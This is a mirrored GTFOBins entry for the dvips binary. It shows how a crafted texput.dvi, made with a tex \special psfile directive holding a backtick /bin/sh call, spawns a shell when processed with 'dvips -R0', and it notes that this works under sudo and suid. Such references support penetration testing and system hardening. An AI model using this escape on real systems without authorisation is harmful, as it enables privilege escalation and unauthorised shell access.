mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
18 lines
336 B
Plaintext
18 lines
336 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
dvips -R0 texput.dvi
|
|
comment: |-
|
|
The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
|
|
|
|
```
|
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
|
```
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|